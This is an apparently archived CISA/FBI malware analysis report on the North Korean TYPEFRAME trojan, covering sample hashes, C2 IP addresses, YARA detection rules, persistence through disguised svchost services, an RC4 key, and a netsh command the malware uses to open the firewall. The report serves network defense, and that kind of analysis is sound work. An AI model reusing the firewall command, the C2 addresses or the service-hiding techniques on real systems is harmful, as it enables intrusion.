{ "id": "56352a00-79cb-43a7-bfe8-1b26753379cb", "created_at": "2026-04-06T00:17:49.492768Z", "updated_at": "2026-04-10T03:38:19.371803Z", "deleted_at": null, "sha1_hash": "434235d6dfc72720cff0494511abdc0d5b214426", "title": "MAR-10135536-12 – North Korean Trojan: TYPEFRAME | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 178894, "plain_text": "MAR-10135536-12 – North Korean Trojan: TYPEFRAME | CISA\r\nPublished: 2019-03-14 · Archived: 2026-04-05 18:40:45 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained within. The DHS does not endorse any commercial\r\nproduct or service, referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol, see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between Department of Homeland Security (DHS) and\r\nthe Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Trojan\r\nmalware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S.\r\nGovernment refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information\r\non HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.\r\nDHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government\r\nmalicious cyber activity.\r\nThis MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended\r\nmitigation techniques. Users or administrators should flag activity associated with the malware, report the activity to CISA\r\nor the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.\r\nThis malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a\r\nmalicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the\r\ncapability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and\r\ncontrol (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections.\r\nFor a downloadable copy of IOCs, see:\r\nMAR-10135536-12.stix\r\nSubmitted Files (11)\r\n201c7cd10a2bd50dde0948d14c3c7a0732955c908a3392aee3d08b94470c9d33 (1C53E7269FE9D84C6DF0A25BA59B82...)\r\n20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n(EF9DB20AB0EEBF0B7C55AF4EC0B7BC...)\r\n3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210 (java.exe)\r\n40ef57ca2a617f5d24ac624339ba2027b6cf301c28684bf8b2075fc7a2e95116 (CA67F84D5A4AC1459934128442C53B...)\r\n4bd7d801d7ce3fe9c2928dbc834b296e934473f5bbcc9a1fd18af5ebd43192cd (3229A6CEA658B1B3CA5CA9AD7B40D8...)\r\n546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1 (6AB301FC3296E1CEB140BF5D294894...)\r\n675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1 (10B28DA8EEFAC62CE282154F273B3E...)\r\n8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8 (F5A4235EF02F34D547F71AA5434D9B...)\r\nc9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\n(BFB41BC0C3856AA0A81A5256B7B8DA...)\r\nd1d490866d4a4d29306f0d9300bffc1450c41bb8fd62371d29672bf9f747bf92 (BF474B8ACD55380B1169BB949D60E9...)\r\ne69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7 (60294C426865B38FDE7C5031AFC4E4...)\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 1 of 40\n\nAdditional Files (3)\r\n089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359 (midimapper.rs)\r\na71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6 (laxhost.dll)\r\ne088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef (dwnhost.dll)\r\nIPs (7)\r\n111.207.78.204\r\n181.119.19.56\r\n184.107.209.2\r\n59.90.93.97\r\n80.91.118.45\r\n81.0.213.173\r\n98.101.211.162\r\nFindings\r\n8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\nTags\r\nbackdoorremote-access-trojantrojan\r\nDetails\r\nName F5A4235EF02F34D547F71AA5434D9BB4\r\nSize 490705 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 f5a4235ef02f34d547f71aa5434d9bb4\r\nSHA1 338699d56f17ab91fa2da1cb446593c013ae1a01\r\nSHA256 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\nSHA512 27c610096248492fce0f8f478c62255cd1abc4ceb4a1ae310ca311a6d38ee3b93ce75ba45089204d0eb2036393bdcb98b3e77396d5ae6b9ee\r\nssdeep 12288:2okf/Epk6/lctEJxrXtl3h1ihDnjvAHR7ie5XtO/DRUKwS4Z/B5:2o6/EpH/iwNXtlhSnjg+e5A/DaZp5\r\nEntropy 7.788643\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAvira TR/Crypt.ZPACK.Gen\r\nBitDefender Trojan.GenericKD.31021159\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.CTWS-9289\r\nESET a variant of Win32/NukeSped.EP trojan\r\nEmsisoft Trojan.GenericKD.31021159 (B)\r\nIkarus Trojan.Crypt\r\nK7 Trojan ( 00535e7c1 )\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 2 of 40\n\nMcAfee RDN/Generic BackDoor\r\nMicrosoft Security Essentials Trojan:Win32/NukeSped\r\nNANOAV Trojan.Win32.NukeSped.feqzlz\r\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTrendMicro BKDR_NUKESPED.I\r\nTrendMicro House Call BKDR_NUKESPED.I\r\nVirusBlokAda Backdoor.Agent\r\nZillya! Backdoor.Agent.Win32.66271\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\" strings: $s0 =\r\n{ 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = {\r\nae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and\r\nuint16(uint32(0x3c)) == 0x4550) and any of them }\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\" strings: $s0 =\r\n{A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6\r\nD5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3\r\n03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\nand all of them }\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-05 21:21:28-04:00\r\nImport Hash edb148321293bdc8b7ba8fbe0b1c6ed9\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ndde6c6e739f41680377511c709f7209a header 4096 0.590336\r\ndb44e1900789a7fd43b05d3871c9ab03 .text 53248 6.538652\r\n91d9797bd52d49fb73009fc3e0cdd7c5 .rdata 12288 3.476192\r\nef4ab26cc2c30397b12c53c759fcbef2 .data 16384 2.132158\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\n8c3e0204f5... Contains a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nDescription\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 3 of 40\n\nThis file is a 32-bit Windows portable executable file designed to install a Remote Access Trojan (RAT) as a service on the\r\nvictim system. The malware accepts the following argument during execution \"68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd”.\r\nThe RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\nhost.dll\r\n\"Task Notification Service\"\r\n\"Monitors And Notifies Task Scheduling And Interaction\"\r\nnetsvcs\r\n--End strings of interest--\r\nWhen executed, the RAT checks if the module \"C:\\Windows\\system32\\laxhost.dll\" is installed on the compromised system.\r\nIf it is not installed, it will load an embedded RC4 encrypted archive file from the start of the offset \"0x15000”.\r\nThe malware decrypts the archive using the same RC4 key. The decrypted archive contains a malicious DLL module, which\r\nis decompressed and installed into \"C:\\Windows\\system32\\laxhost.dll”. The first three characters of the module name are\r\nrandomly generated.\r\nThe malware contains an RC4 encrypted configuration file data (192 bytes). During runtime, it installs the encrypted\r\nconfiguration data into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe malware installs a malicious DLL module as a serviceDLL in the \"netsvcs\" service group in order to execute\r\n\"C:\\Windows\\system32\\laxhost.dll\" using the Windows service hosting process,\r\n\"%SYSTEMROOT%\\system32\\svchost.exe.\" The service name and the display name are randomly generated.\r\nThe installed service information is displayed below:\r\n--Begin service information--\r\nServiceName = \"Irmon\"\r\nDisplayName = \"Irmon\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k netsvcs\"\r\n--End service information--\r\na71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nTags\r\nbackdoorremote-access-trojantrojan\r\nDetails\r\nName laxhost.dll\r\nSize 843776 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 aa7924157b77dd1ff749d474f3062f90\r\nSHA1 4f02a6bf2b24c371e9f589cff8e32b4d94cf4f29\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 4 of 40\n\nSHA256 a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nSHA512 5150d8b063297d0da04288b4e4e2ad3d54b7546d909a71557789529d73703673098c37970280cd62c45306458cfcda701c1a7cee31ee7fb2\r\nssdeep 24576:r/pmC31xkE8sOvtQ6Wtuc0WhgpaM2yYq:bpj0E8sOvtQ6Wtuc0WhgpaM2yYq\r\nEntropy 6.681288\r\nAntivirus\r\nAhnlab Backdoor/Win32.Nukesped\r\nAntiy Trojan/Win32.AGeneric\r\nAvira TR/AD.LazerusAPT.cpdeh\r\nBitDefender Trojan.GenericKD.31015744\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.KSYA-1796\r\nESET a variant of Win32/NukeSped.EP trojan\r\nEmsisoft Trojan.GenericKD.31015744 (B)\r\nFilseclab W32.NukeSped.EP.zous\r\nIkarus Trojan.Win32.NukeSped\r\nK7 Riskware ( 0040eff71 )\r\nMcAfee RDN/Generic BackDoor\r\nMicrosoft Security Essentials Backdoor:Win32/SilverMob.A!dha\r\nNANOAV Trojan.Win32.Redcap.fepugy\r\nSophos Troj/Cruprox-B\r\nSystweak malware.gen-ra\r\nTrendMicro BKDR_NU.6961FCEE\r\nTrendMicro House Call BKDR_NU.6961FCEE\r\nVirusBlokAda Backdoor.SilverMob\r\nZillya! Trojan.NukeSped.Win32.79\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\" strings: $s0 =\r\n{A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6\r\nD5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3\r\n03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\nand all of them }\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-06-09 13:59:30-04:00\r\nImport Hash 180f8d53e7b967e9af9444547c05f192\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 5 of 40\n\nCompany Name Microsoft Corporation\r\nFile Description Xps Object Model in memory creation and deserialization\r\nInternal Name xpsservices.dll\r\nLegal Copyright Microsoft Corporation. All rights reserved.\r\nOriginal Filename xpsservices.dll\r\nProduct Name Microsoft Windows Operating System\r\nProduct Version 6.1.7601.17514\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ne1b6f98aadc18cf1b2e1796eb3d8b783 header 4096 0.800174\r\n5d97a9d06913043a085d8071f7a5ab7c .text 540672 6.661444\r\nbab7eb304870fe36e8c98f5085b8603c .rdata 163840 6.184319\r\n33e00b6b91f87e1e948a8bc44803837f .data 81920 4.853104\r\n4093ef4294e5d39c92ba4d89a6c92a15 .rsrc 8192 3.983157\r\n39ddff289842b4fafc796c9795b870c8 .reloc 45056 5.723684\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nRelationships\r\na71017302e... Connected_To 59.90.93.97\r\na71017302e... Contained_Within 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8\r\nDescription\r\nlaxhost.dll (original name: KDCOLCWP.DLL) is a 32-bit Windows dynamic-link library (DLL) file and is a RAT module\r\nthat was installed as a service by the file 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8.\r\nlaxhost.dll’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nWhen executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains hexadecimal-encoded C2 IP address and port number:\r\n--Begin IP and port # list -\r\nBB 01 3B 5A 5D 61 ==\u003e 59.90.93.97:443\r\n--End IP and port # list --\r\nThe malware attempts to connect to its C2 server 59.90.93.97 using port 443 and wait for further instructions.\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 6 of 40\n\nThe malware is designed to accept instructions from the remote server to perform the following functions:\r\n--Begin functions performed by the malware--\r\nGet Disk Free Space\r\nSearch for files\r\nExecute process in elevated mode\r\nTerminate processes\r\nDelete files\r\nExecute command-using shell\r\nDownload and upload files\r\nRead files and write files\r\nDelete Service and uninstall malware components using a batch script\r\n--End functions performed by the malware--\r\n675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nTags\r\ndropperproxytrojan\r\nDetails\r\nName 10B28DA8EEFAC62CE282154F273B3E34\r\nSize 466267 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 10b28da8eefac62ce282154f273b3e34\r\nSHA1 25991d00eb1b1204b0066d5aeb79ac691047d7f0\r\nSHA256 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nSHA512 7955c46e3d5ed3454340821caecd44d6bc1b918ef7bdcd6f0f8d67676cbf0fde52a578583a0388c4d838652d3d1da4615ced6ae2c59b562f0\r\nssdeep 6144:qoXLxi/EpH/ae6jEazjsHZ3OJJMUc6ngmOsH95rjw26XwXFLP7E1tC1KRtyn5o1n:qoQ/EpH/mEaiZiJy6ngm95t6qLPJp2d\r\nEntropy 7.761748\r\nAntivirus\r\nAhnlab Malware/Win32.Generic\r\nAntiy Trojan/Win32.TSGeneric\r\nAvira TR/Agent.ajluz\r\nBitDefender Trojan.GenericKD.31017444\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.LYOG-8913\r\nESET a variant of Win32/Agent.YDV trojan\r\nEmsisoft Trojan.GenericKD.31017444 (B)\r\nIkarus Trojan.Win32.Agent\r\nK7 Trojan ( 004fa2411 )\r\nMcAfee Generic.dvp\r\nMicrosoft Security Essentials Trojan:Win32/Autophyte.B!dha\r\nNANOAV Trojan.Win32.Drop.feqzpd\r\nSophos Troj/Agent-AZOF\r\nSymantec Trojan Horse\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 7 of 40\n\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda BScope.TrojanDropper.Agent\r\nZillya! Trojan.Agent.Win32.902273\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule enc_PK_header { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"3229a6cea658b1b3ca5ca9ad7b40d8d4\" strings: $s0 =\r\n{ 5f a8 80 c5 a0 87 c7 f0 9e e6 } $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a } $s2 = {\r\nae 1d af 74 c0 f5 e1 02 50 10 } condition: (uint16(0) == 0x5A4D and\r\nuint16(uint32(0x3c)) == 0x4550) and any of them }\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\" strings: $s0 =\r\n{A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6\r\nD5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3\r\n03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\nand all of them }\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2016-07-24 19:38:33-04:00\r\nImport Hash 225e9f7be86d6676c98a852492458049\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n58c7eb8637b7fbde7bb31985b77ca1af header 4096 0.591843\r\n65d9f034d6153048c3e51bf5e07d6486 .text 53248 6.446416\r\neb9c5e8a429ac587cd35f0dcec939295 .rdata 12288 3.434883\r\nd80b556aaa361958d9ecd816ac2a36c7 .data 16384 2.106829\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ v6.0\r\nRelationships\r\n675a35e04b... Contains e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\nDescription\r\nThis file is a 32-bit Windows executable designed to install a proxy module as a service on the victim’s system. This file\r\naccepts the following arguments during execution: \"68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd.\"\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin RC4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End RC4 key--\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 8 of 40\n\nDecrypted strings of interest are displayed below:\r\n--Begin strings of interest--\r\n\"wmplayer.xml\"\r\n\"printcache.tlb\"\r\n\"Print Device Cache\"\r\n\"Manage Print Device Cache And Printing\"\r\nprintcache\r\n--End strings of interest--\r\nWhen executed, it will load an embedded RC4 encrypted archive file from the start of the offset \"0x15000.\"\r\nThe malware decrypts the archive using the same RC4 key. The decrypted archive contains a proxy module, which is\r\ndecompressed and installed from the existing file name \"wmplayer.xml\" to \"C:\\Windows\\system32\\printcache.tlb.\"\r\nThe malware installs the module as a serviceDLL in the \"printcache\" service group in order to execute\r\n\"C:\\Windows\\system32\\printcache.tlb\" using the Windows service hosting process,\r\n\"%SYSTEMROOT%\\system32\\svchost.exe.\"\r\n--Begin service--\r\nServiceName = \"printcache\"\r\nDisplayName = \"Print Device Cache\"\r\nDesiredAccess = SERVICE_ALL_ACCESS\r\nServiceType = SERVICE_WIN32_SHARE_PROCESS\r\nStartType = SERVICE_AUTO_START\r\nBinaryPathName = \"%SYSTEMROOT%\\system32\\svchost.exe -k printcache\"\r\n--End service--\r\nThe malware contains an RC4 encrypted configuration file data, which contains port numbers (8 bytes). During runtime, it\r\ninstalls the encrypted configuration data into the following registry key:\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\ne69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\nTags\r\nproxytrojan\r\nDetails\r\nName 60294C426865B38FDE7C5031AFC4E453\r\nSize 778240 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 60294c426865b38fde7c5031afc4e453\r\nSHA1 f8736e3f89f30f082cfd68a73763afcfb0e1c9c3\r\nSHA256 e69d6c2d3e9c4beebee7f3a4a3892e5fdc601beda7c3ec735f0dfba2b29418a7\r\nSHA512 fe96fa2f127a3a71a9edc89268567188f8c585ea8356feb9a2c46224dc7022b3d751848424df745b517e7a1e123c566b6feb094653281026ff\r\nssdeep 12288:8iwDMd29KJgSWD8QfEbsjlqxlsiAen1XQ1pV+jPAt:8WghEbvhAeC1pIDAt\r\nEntropy 6.714021\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 9 of 40\n\nAntiy Trojan/Win32.Agentb\r\nAvira TR/RedCap.gzgan\r\nBitDefender Gen:Variant.Symmi.14589\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.LQBT-4086\r\nESET Win32/NukeSped.EO trojan\r\nEmsisoft Gen:Variant.Symmi.14589 (B)\r\nIkarus Trojan-Proxy.Win32.SilverMob\r\nK7 Trojan ( 00535e7f1 )\r\nMcAfee GenericRXFZ-TW!60294C426865\r\nMicrosoft Security Essentials TrojanProxy:Win32/SilverMob.A!dha\r\nNANOAV Trojan.Win32.RedCap.feqzkt\r\nSophos Troj/Cruprox-B\r\nSymantec Trojan Horse\r\nTACHYON Process timed out\r\nTrendMicro TROJ_PROXSPED.A\r\nTrendMicro House Call TROJ_PROXSPED.A\r\nVirusBlokAda Trojan.Agentb\r\nZillya! Trojan.Agentb.Win32.19365\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\" strings: $s0 =\r\n{A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6\r\nD5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3\r\n03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\nand all of them }\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-03-02 14:01:47-05:00\r\nImport Hash 09e63e3d425d6b543de4003f71c2b66d\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n1eda6d8dec57fac45afb42a6f27080a0 header 4096 0.767469\r\n4109d939d8532ac1bd9f2cfa81a33905 .text 475136 6.632858\r\n3b24a4913977b402a4dcce1694306cfb .rdata 147456 5.923542\r\nf597eb4917ef44a2f9a080fc59f528f3 .data 77824 4.968551\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 10 of 40\n\nMD5 Name Raw Size Entropy\r\n77c814f5856057e7a7f6237bbba51a76 .rsrc 32768 7.100017\r\n438ec3064d499d63eb03035aa1f7a142 .reloc 40960 5.759460\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C++ 6.0\r\nMicrosoft Visual C++ 6.0 DLL (Debug)\r\nRelationships\r\ne69d6c2d3e... Contained_Within 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1\r\nDescription\r\nThis file, printcache.tlb (original name: PDll.dll), is a proxy module installed as a service by the file\r\n675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1. This file is designed to open the Windows\r\nFirewall on the victim’s machine to allow incoming connections and force the compromised system to function as a proxy\r\nserver.\r\nThe malware’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:\r\n--Begin Rc4 key--\r\n85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B\r\n--End Rc4 key--\r\nWhen executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key.\r\n--Begin registry key--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs\"\r\nValueName = \"Description\"\r\nValueData = \"RC4 encrypted configuration file data\"\r\n--End registry key--\r\nThe decrypted data contains hexadecimal encoded port numbers:\r\n--Begin port # list --\r\nBB 01 ==\u003e 1BB ==\u003e 443\r\n7F 00 ==\u003e 7F ==\u003e 127\r\n90 1F ==\u003e 1F90 == 8080\r\n--End port # list --\r\nThe malware utilized the following command to open the Windows Firewall on the victim’s machine to allow incoming\r\nconnections.\r\n--Begin firewall modification--\r\n\"netsh.exe advfirewall firewall add rule name=\"PortOpenning\" dir=in protocol=tcp localport=443 action\"\r\n--End firewall modification--\r\nThe malware attempts to open ports 443, 127, and 8080 and wait for a connection. The malware contains public SSL\r\ncertificates in its resource named \"101” and is designed to generate crafted TLS sessions (fake TLS communication\r\nmechanism).\r\n089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359\r\nTags\r\nproxytrojan\r\nDetails\r\nName midimapper.rs\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 11 of 40\n\nSize 761856 bytes\r\nType PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nMD5 00b0cfb59b088b247c97c8fed383c115\r\nSHA1 0cdee734d3a17de0e81b9b2b0b36804d516c3212\r\nSHA256 089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359\r\nSHA512 9c9f65e277816a42574ddc28724e1afde8c3bffd0e8bf2e0414204d7b07384848718ada43e59c206b6d13dca33c28c4ae3a82ec12b21207efa\r\nssdeep 12288:5XYoUXvfAkdRwowG358mOlVvRaXKgCJpV4DDxazfAF:+zwowHJ46jJp+DmfAF\r\nEntropy 6.693566\r\nAntivirus\r\nAhnlab Trojan/Win32.Agent\r\nAntiy Trojan/Win32.Agentb\r\nBitDefender Gen:Variant.Symmi.14589\r\nClamAV Win.Trojan.Typeframe-6595033-1\r\nCyren W32/Trojan.DYIG-2477\r\nESET Win32/NukeSped.AQ trojan\r\nEmsisoft Gen:Variant.Symmi.14589 (B)\r\nIkarus Trojan.Win32.Agentb\r\nK7 Trojan ( 0051e0501 )\r\nMcAfee GenericRXFZ-TW!00B0CFB59B08\r\nMicrosoft Security Essentials TrojanProxy:Win32/SilverMob.A!dha\r\nNANOAV Trojan.Win32.NukeSped.eylorq\r\nSophos Troj/NukeSped-A\r\nSymantec Trojan.Gen.2\r\nTrendMicro TROJ_NUKESPED.D\r\nTrendMicro House Call TROJ_NUKESPED.D\r\nVirusBlokAda Trojan.Agentb\r\nZillya! Trojan.Agentb.Win32.18439\r\nYara Rules\r\nhidden_cobra_consolidated.yara\r\nrule import_obfuscation_2 { meta: author = \"NCCIC trusted 3rd party\" incident =\r\n\"10135536\" date = \"2018-04-12\" category = \"hidden_cobra\" family =\r\n\"TYPEFRAME\" hash0 = \"bfb41bc0c3856aa0a81a5256b7b8da51\" strings: $s0 =\r\n{A6 D6 02 EB 4E B2 41 EB C3 EF 1F} $s1 = {B6 DF 01 FD 48 B5 } $s2 = {B6\r\nD5 0E F3 4E B5 } $s3 = {B7 DF 0E EE } $s4 = {B6 DF 03 FC } $s5 = {A7 D3\r\n03 FC } condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\nand all of them }\r\nssdeep Matches\r\n100 